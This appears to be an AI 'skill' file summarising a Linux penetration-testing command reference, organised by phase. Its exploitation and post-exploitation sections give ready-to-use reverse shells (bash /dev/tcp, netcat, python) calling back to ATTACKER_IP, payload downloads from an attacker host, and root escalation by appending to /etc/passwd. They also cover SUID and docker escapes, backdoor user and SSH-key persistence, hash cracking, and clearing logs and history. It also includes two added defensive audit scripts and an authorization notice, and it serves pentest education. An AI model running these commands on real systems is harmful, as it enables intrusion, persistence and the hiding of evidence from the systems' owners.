---
name: linux-pentester-commands
description: Practical Linux command reference for penetration testing, reconnaissance, exploitation, and privilege escalation
triggers:
- how do I enumerate services on a Linux target
- show me privilege escalation commands for pentesting
- what are common recon commands for Linux systems
- help me with post-exploitation techniques on Linux
- how to find SUID binaries for privilege escalation
- what commands should I use for network reconnaissance
- show me Linux exploitation commands
- how to perform local enumeration on a compromised system
---
# Linux Pentester Commands Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
The **Linux for a Pentester** repository is a comprehensive, hands-on collection of Linux commands and techniques specifically curated for penetration testing workflows. It provides practical command references organized by testing phases: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
This is a reference repository meant for quick lookups during active penetration tests, CTFs, and security assessments. All content focuses on real-world usage with actual flags and troubleshooting notes.
## Installation & Setup
```bash
# Clone the repository
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
# Navigate to the directory
cd Linux-for-a-Pentester
# Browse modules by phase
ls -la
```
The repository is organized into directories by testing phase. Each directory contains markdown files with commands, explanations, and practical examples.
## Repository Structure
```
Linux-for-a-Pentester/
├── 00-General-Commands/ # Daily survival commands
├── 01-Recon/ # Reconnaissance phase
├── 02-Enumeration/ # Service and user enumeration
├── 03-Exploitation/ # Initial access techniques
├── 04-Privilege-Escalation/ # Escalation to root
├── 05-Post-Exploitation/ # Persistence and lateral movement
└── Cheatsheets/ # Quick reference one-liners
```
## Key Command Categories
### General Commands (00-General-Commands)
Essential Linux survival commands for navigation and file operations:
```bash
# System information
uname -a # Kernel and system info
cat /etc/os-release # Distribution details
whoami # Current user
id # User and group IDs
# File operations
find / -name "*.conf" 2>/dev/null # Find config files
grep -r "password" /var/log 2>/dev/null # Search for passwords
ls -lah # Detailed listing with hidden files
# Process management
ps aux # All running processes
ps -ef --forest # Process tree view
top # Interactive process viewer
```
### Reconnaissance (01-Recon)
Local and network reconnaissance commands:
```bash
# Network interfaces and connections
ip a # IP addresses and interfaces
ip route # Routing table
ss -tulpn # Listening ports and services
netstat -tulpn # Same view on older systems without ss
# Network discovery
ping -c 3 192.168.1.1 # Check host availability
arp -a # ARP cache
for i in {1..254}; do ping -c 1 192.168.1.$i & done # Ping sweep
# DNS and service discovery
nslookup target.com
dig target.com ANY # Many resolvers refuse ANY; fall back to A, MX, TXT, NS queries
host target.com
# Port scanning (if nmap available)
nmap -sV -sC -p- 192.168.1.10 # Full port scan with version detection
```
### Enumeration (02-Enumeration)
Deep service and system enumeration:
```bash
# User enumeration
cat /etc/passwd # All users
cat /etc/group # All groups
w # Logged in users
last # Login history
lastlog # Last login per user
# File system enumeration
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -2000 -type f 2>/dev/null # SGID binaries
find / -writable -type d 2>/dev/null # World-writable directories
find /home -type f -name ".*" 2>/dev/null # Hidden files in home dirs
# Service enumeration
cat /etc/services # Service to port mappings
systemctl list-units --type=service # Running services (systemd)
service --status-all # All services (SysV init)
# Installed software
dpkg -l # Debian/Ubuntu packages
rpm -qa # RedHat/CentOS packages
which gcc python python3 perl ruby # Available compilers and interpreters
# Scheduled tasks
cat /etc/crontab # System cron jobs
ls -la /etc/cron.* # Cron directories
crontab -l # User cron jobs
```
### Exploitation (03-Exploitation)
Initial access and exploitation techniques:
```bash
# Reverse shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 # Bash reverse shell
nc -e /bin/bash ATTACKER_IP 4444 # Netcat with -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f # Netcat without -e
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Shell upgrade (after initial access)
python -c 'import pty;pty.spawn("/bin/bash")' # PTY shell
export TERM=xterm # Terminal type
# Press Ctrl+Z to background the shell
stty raw -echo; fg # Disable echo, foreground
stty rows 38 columns 116 # Set terminal size
# File transfer
# On attacker: python3 -m http.server 8000
wget http://ATTACKER_IP:8000/exploit.sh
curl -O http://ATTACKER_IP:8000/exploit.sh
# On attacker: nc -lvnp 4444 < file
nc ATTACKER_IP 4444 > file # On target
# Credential hunting
grep -ir "password" /var/www/html 2>/dev/null
find / -name "*.db" -o -name "*.sql" 2>/dev/null
cat ~/.bash_history # Command history
env | grep -i pass # Environment variables
```
### Privilege Escalation (04-Privilege-Escalation)
Techniques to escalate to root privileges:
```bash
# Automated enumeration scripts
# Upload and run LinPEAS, LinEnum, or similar
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Manual SUID/SGID checks
find / -perm -u=s -type f 2>/dev/null # SUID binaries
find / -perm -g=s -type f 2>/dev/null # SGID binaries
# Sudo privileges
sudo -l # List sudo permissions for current user
# Writable /etc/passwd (rare but effective)
openssl passwd -1 -salt xyz password123 # Generate hash
echo 'newroot:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
# Exploitable capabilities
getcap -r / 2>/dev/null # Find capabilities
# Cron job abuse
cat /etc/crontab
ls -la /etc/cron.*
# Check if writable cron scripts exist
# PATH hijacking
echo $PATH
# If writable directory in PATH, create malicious binary
# Kernel exploits (last resort)
uname -a # Check kernel version
searchsploit linux kernel 4.4.0 # Search for exploits
# NFS misconfiguration
cat /etc/exports # Check for no_root_squash
showmount -e TARGET_IP # Remote NFS shares
# Docker escape (if in docker group)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
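The defender-side counterpart to the SUID/SGID `find -perm` checks in the Enumeration and Privilege Escalation sections, added here as an example (not code from the Linux-for-a-Pentester repository): record a baseline of setuid/setgid files once, then report anything that later appears or changes. It assumes GNU find (for `-printf`) and POSIX `sort`/`comm`; the root directory and baseline path are arguments.

```shell
#!/bin/sh
# Added audit helper (not from the Linux-for-a-Pentester repo): record a
# baseline of setuid/setgid files and report any that appear later. The
# same find -perm checks used for enumeration above are what a defender
# compares against a known-good list; a new SUID copy of a shell or editor
# is a common escalation artefact. Assumes GNU find (-printf).

# List setuid/setgid regular files under $1 as "mode owner path", sorted.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u %p\n' 2>/dev/null | sort
}

# Save the current listing of root $1 as baseline file $2.
record_baseline() {
    list_setid "$1" > "$2"
}

# Print entries present now under $1 but absent from baseline $2
# (a new file, or an existing file whose mode or owner changed).
report_new_setid() {
    list_setid "$1" | comm -13 "$2" -
}

# Returns 0 when $1 matches baseline $2, 1 (printing the offenders) otherwise.
audit_setid() {
    new=$(report_new_setid "$1" "$2")
    if [ -n "$new" ]; then
        printf 'NEW setuid/setgid files under %s:\n%s\n' "$1" "$new"
        return 1
    fi
    return 0
}

# Usage: sh setid_audit.sh baseline / /var/lib/setid.baseline   (once, on a clean host)
#        sh setid_audit.sh audit    / /var/lib/setid.baseline   (periodically)
case "${1:-}" in
    baseline) record_baseline "$2" "$3" ;;
    audit)    audit_setid "$2" "$3" ;;
esac
```

Store the baseline somewhere the audited host cannot modify; a non-zero exit from `audit` is the signal to investigate the listed paths.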
### Post-Exploitation (05-Post-Exploitation)
Persistence, cleanup, and lateral movement:
```bash
# Persistence via SSH keys
mkdir -p ~/.ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Backdoor user creation
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor # Add to sudo group
# Credential harvesting
cat /etc/shadow # Password hashes (requires root)
unshadow /etc/passwd /etc/shadow > hashes.txt # For John/Hashcat
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Network pivoting
# SSH tunneling
ssh -L LOCAL_PORT:TARGET:TARGET_PORT user@pivot_host # Local forward
ssh -R REMOTE_PORT:TARGET:TARGET_PORT user@pivot_host # Remote forward
ssh -D 8080 user@pivot_host # SOCKS proxy
# Covering tracks
history -c # Clear command history
rm ~/.bash_history # Delete history file
# Modify timestamps
touch -r /reference_file /modified_file
# Clear logs (high suspicion)
echo "" > /var/log/auth.log
```
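To show what the persistence and credential techniques in this section look like from the defender's side, here is an added detection helper (not code from the Linux-for-a-Pentester repository). It checks for a UID-0 account appended to `/etc/passwd`, a hash written directly into the passwd field, unexpected sudo/wheel members, and authorized_keys entries; file paths are parameters so it also runs against copied or mounted files, and it assumes only POSIX sh and awk.

```shell
#!/bin/sh
# Added detection helper (not from the Linux-for-a-Pentester repo) for the
# persistence artefacts the commands above leave behind: a UID-0 line
# appended to /etc/passwd, a hash stored directly in passwd, a new member
# of the sudo group, and an authorized_keys entry nobody recognises.
# Paths are parameters so the checks also run on a copied or mounted image.

# Accounts other than "root" with UID 0 (e.g. a "newroot:HASH:0:0" line).
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Accounts whose passwd field holds a hash instead of the "x" shadow marker.
passwd_with_inline_hash() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "" && $2 !~ /^!/ { print $1 }' \
        "${1:-/etc/passwd}"
}

# Supplementary members of the sudo or wheel group, one per line
# (a user whose primary group is sudo is not listed here).
sudo_group_members() {
    awk -F: '$1 == "sudo" || $1 == "wheel" {
        n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] != "") print m[i] }' \
        "${1:-/etc/group}"
}

# "user key-comment" for every key in HOME_ROOT/*/.ssh/authorized_keys,
# so each key can be matched to a known person or device.
list_authorized_keys() {
    for f in "${1:-/home}"/*/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        u=$(basename "$(dirname "$(dirname "$f")")")
        grep -v '^#' "$f" | awk -v u="$u" 'NF >= 2 { print u, ($3 != "" ? $3 : "(no comment)") }'
    done
}

# Print all four checks for passwd file $1, group file $2, home root $3.
report_all() {
    printf -- '-- extra UID-0 accounts --\n';            extra_uid0_accounts "$1"
    printf -- '-- inline password hashes in passwd --\n'; passwd_with_inline_hash "$1"
    printf -- '-- sudo/wheel members --\n';               sudo_group_members "$2"
    printf -- '-- authorized_keys entries --\n';          list_authorized_keys "$3"
}

# Usage: sh persist_audit.sh --live      (checks /etc/passwd, /etc/group, /home)
case "${1:-}" in
    --live) report_all /etc/passwd /etc/group /home ;;
esac
```

Any output under the first two headings is abnormal on a stock system; the other two lists are meant to be compared against what the administrators expect.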
## Common Patterns & Workflows
### Standard Pentesting Workflow
```bash
# 1. Initial Reconnaissance
whoami && id
uname -a
cat /etc/os-release
# 2. Network Discovery
ip a
ip route
ss -tulpn
# 3. User and File Enumeration
cat /etc/passwd
find / -perm -4000 -type f 2>/dev/null
# 4. Check Sudo Permissions
sudo -l
# 5. Search for Credentials
grep -ir "password" /var/www /opt /home 2>/dev/null
cat ~/.bash_history
# 6. Upload and Run Automated Script
wget http://ATTACKER_IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_output.txt
# 7. Exploit Finding
# Based on linpeas output, exploit SUID, sudo, cron, etc.
# 8. Stabilize Access
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# 9. Establish Persistence (if authorized)
mkdir -p ~/.ssh
echo "PUBLIC_KEY" >> ~/.ssh/authorized_keys
```
### Quick SUID Exploitation Example
```bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for exploitation
# Example: if /usr/bin/find has SUID
/usr/bin/find . -exec /bin/sh -p \; -quit
# Example: if /usr/bin/vim.basic has SUID
/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
```
### Credential Hunting Pattern
```bash
# Search common locations
find /var/www /home /opt -type f \( -name "*.conf" -o -name "*.config" -o -name "*.xml" \) -exec grep -i "password" {} + 2>/dev/null
# Database files
find / -name "*.db" -o -name "*.sql" -o -name "*.sqlite" 2>/dev/null
# History files
cat ~/.bash_history ~/.mysql_history ~/.psql_history 2>/dev/null
# Environment and process info
env | grep -i pass
ps aux | grep -i pass
```
## Troubleshooting
### Command Not Found Issues
```bash
# If standard tools missing, check for alternatives
which nc netcat ncat # Netcat variants
which wget curl # Download tools
which python python2 python3 # Python versions
# Use absolute paths if PATH is restricted
/usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
/bin/bash -i
```
### Permission Denied Errors
```bash
# Use 2>/dev/null to suppress permission errors
find / -name "flag.txt" 2>/dev/null
# Check current user context
id
groups
sudo -l
```
### Shell Stability Issues
```bash
# If shell keeps dying, try different reverse shell methods
# Use script command for better PTY
script /dev/null -c bash
# If Ctrl+C kills shell, use proper upgrade:
python -c 'import pty;pty.spawn("/bin/bash")'
# Then: Ctrl+Z
stty raw -echo; fg
export TERM=xterm
```
### Network Access Restrictions
```bash
# Check firewall rules
iptables -L -n
nft list ruleset
# Check if egress filtering exists
nc -zv ATTACKER_IP 80 443 8080 4444 # Test common ports
# Try alternate protocols
# DNS tunneling, ICMP tunneling if TCP/UDP blocked
```
## Best Practices
1. **Always redirect errors**: Use `2>/dev/null` to avoid cluttering output with permission errors
2. **Document findings**: Save command output with `| tee output.txt`
3. **Check permissions first**: Use `sudo -l` and `id` before attempting privilege escalation
4. **Stabilize shells immediately**: Upgrade to PTY shell as soon as you get initial access
5. **Use automation wisely**: Run LinPEAS/LinEnum but understand manual enumeration
6. **Stay in scope**: Only use these commands within authorized testing boundaries
## Security Notice
⚠️ **IMPORTANT**: These commands and techniques are for authorized penetration testing, security research, and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.
## Additional Resources
- Reference GTFOBins (https://gtfobins.github.io/) for SUID/sudo exploitation
- Use searchsploit for finding kernel exploits: `searchsploit linux kernel`
- Check HackTricks (https://book.hacktricks.xyz/) for detailed exploitation guides
- Practice in legal environments: HackTheBox, TryHackMe, PentesterLab
Creator's repository · aradotso/security-skills